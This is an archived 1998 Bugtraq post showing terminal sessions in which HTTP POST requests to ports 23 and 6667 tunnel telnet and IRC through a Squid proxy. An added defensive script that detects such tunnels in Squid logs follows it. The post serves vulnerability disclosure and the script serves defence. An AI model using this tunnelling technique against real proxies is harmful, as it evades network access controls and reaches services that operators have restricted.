Bugtraq mailing list archives

Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering


From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Tue, 13 Oct 1998 23:08:44 +0200


On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
> Date: Thu, 08 Oct 1998 08:27:36 +0100
> From:  "Mnemonix" <mnemonix () globalnet co uk>
>
> Firstly it seems that most web-based proxies, not just MS Proxy, are
> susceptible to this kind of attack. Thanks to Greg Jones and others for
> doing some testing on this.
>
> HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
> pass them straightforward.

Very untrue. Look at this:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0


VuurWerk Internet Telnet Server
(telnet.vuurwerk.nl)

Alle transacties worden gelogged, het gebruik
van deze server is alleen voor klanten van
VuurWerk tbv. het onderhoud van hun eigen site.

POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200

login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
  PID TTY STAT TIME COMMAND
 5896  p6 S    0:00 /bin/login -h p8ur.cistron.nl -p
 5901  p6 S    0:00  \_ -bash
 6175  p6 S    0:00      \_ telnet proxy 8080
 6186  p8 S    0:00 /bin/login -h rotterdam vuurwerk.nl -p
 6190  p8 S    0:00  \_ -bash
 6205  p8 R    0:00      \_ ps xfww
[hardbeat@haarlem hardbeat]$


Haarlem is the shell machine here, also CNAMEd telnet. The proxy (Squid/1.1.21)
will happily forward me, and telnet works as if there's no proxy in between.

Another great example:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0

nick Hardbeat2
PING:1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST

I can happily IRC now... imagine how easy it would be to write an IRC bouncer
that uses a proxy. Lots of proxies have NO acl or firewall around them.

The only thing I have _not_ succeeded in until now is chaining proxies with
GET or POST requests.

Greetz, Peter.
--
'I guess anybody who walks away from a root shell at :         Peter van Dijk
 a nerd party gets what they deserve!' -- BillSF     :peter () attic vuurwerk nl
-- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --
finger peter () jamaica xs4all nl for my public PGP-key
  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -
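The tunnelling shown in this thread (a POST to http://telnet:23/ or http://irc.pi.net:6667/ that the proxy forwards unchanged) leaves a trace in the proxy's own access log: a request whose target port is not an HTTP port. The following script is an added example written for this archive page, not code from the original post or from Squid; it parses Squid native-format access.log lines and flags requests to ports outside a conservative port list, plus CONNECT requests to anything but a TLS port. The log lines, IP addresses (TEST-NET range) and the port lists are constructed assumptions for the demonstration.

```python
"""Flag proxy-tunnelling attempts in Squid native access.log lines.

Added example, not part of the original post. Assumes the Squid native
log format (timestamp elapsed client status/code size method URL ident
hierarchy/from type); the sample lines and port sets are constructed.
"""
from urllib.parse import urlsplit

# Ports a forward HTTP proxy is normally expected to reach.  Assumption:
# a small allow-list in the spirit of Squid's Safe_ports ACL; tune locally.
SAFE_PORTS = {80, 443, 8080, 8000, 8443}
# CONNECT (raw TCP tunnel) should only be allowed towards TLS ports.
SSL_PORTS = {443}

# Constructed sample log: one normal GET, the two POST tunnels from the post
# (telnet on 23, IRC on 6667), one legitimate CONNECT and one SMTP tunnel.
SAMPLE_LOG = """\
908316000.123    120 192.0.2.22 TCP_MISS/200 512 GET http://www.vuurwerk.nl/ - DIRECT/192.0.2.10 text/html
908316010.456  60000 192.0.2.22 TCP_MISS/200 8 POST http://telnet:23/ - DIRECT/192.0.2.20 -
908316020.789 120000 192.0.2.22 TCP_MISS/200 9 POST http://irc.pi.net:6667/ - DIRECT/192.0.2.41 -
908316030.000    300 192.0.2.22 TCP_MISS/200 2048 CONNECT www.example.com:443 - DIRECT/192.0.2.34 -
908316040.000  90000 192.0.2.22 TCP_MISS/200 5 CONNECT mail.example.com:25 - DIRECT/192.0.2.35 -
"""


def target_port(method, url):
    """Return the TCP port the proxy would open for this request, or None."""
    if method == "CONNECT":
        # CONNECT carries "host:port" with no scheme.
        _host, sep, port = url.rpartition(":")
        return int(port) if sep and port.isdigit() else None
    parts = urlsplit(url)
    try:
        if parts.port is not None:
            return parts.port
    except ValueError:          # non-numeric port in the URL
        return None
    return {"http": 80, "https": 443}.get(parts.scheme)


def parse_line(line):
    """Pull the fields we need out of one native-format access.log line."""
    fields = line.split()
    if len(fields) < 7:
        return None
    return {"time": fields[0], "elapsed_ms": int(fields[1]),
            "client": fields[2], "status": fields[3],
            "method": fields[5], "url": fields[6]}


def find_tunnels(log_text):
    """Return (client, method, url, port, reason) for each suspicious entry."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        port = target_port(rec["method"], rec["url"])
        if port is None:
            continue
        if rec["method"] == "CONNECT" and port not in SSL_PORTS:
            hits.append((rec["client"], rec["method"], rec["url"], port,
                         "CONNECT to non-TLS port"))
        elif rec["method"] != "CONNECT" and port not in SAFE_PORTS:
            hits.append((rec["client"], rec["method"], rec["url"], port,
                         "request to non-HTTP port"))
    return hits


if __name__ == "__main__":
    for hit in find_tunnels(SAMPLE_LOG):
        print(hit)
```

Running it lists the telnet, IRC and SMTP entries and leaves the GET and the CONNECT to port 443 alone. Long `elapsed_ms` values on such entries are a second tell: an interactive telnet or IRC session held open through a single POST lasts far longer than a normal page fetch. The same port allow-list is what current Squid enforces at request time with `acl Safe_ports port ...` and `http_access deny !Safe_ports` (and `acl SSL_ports port 443` with `http_access deny CONNECT !SSL_ports`), which closes the hole the post describes instead of merely logging it.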


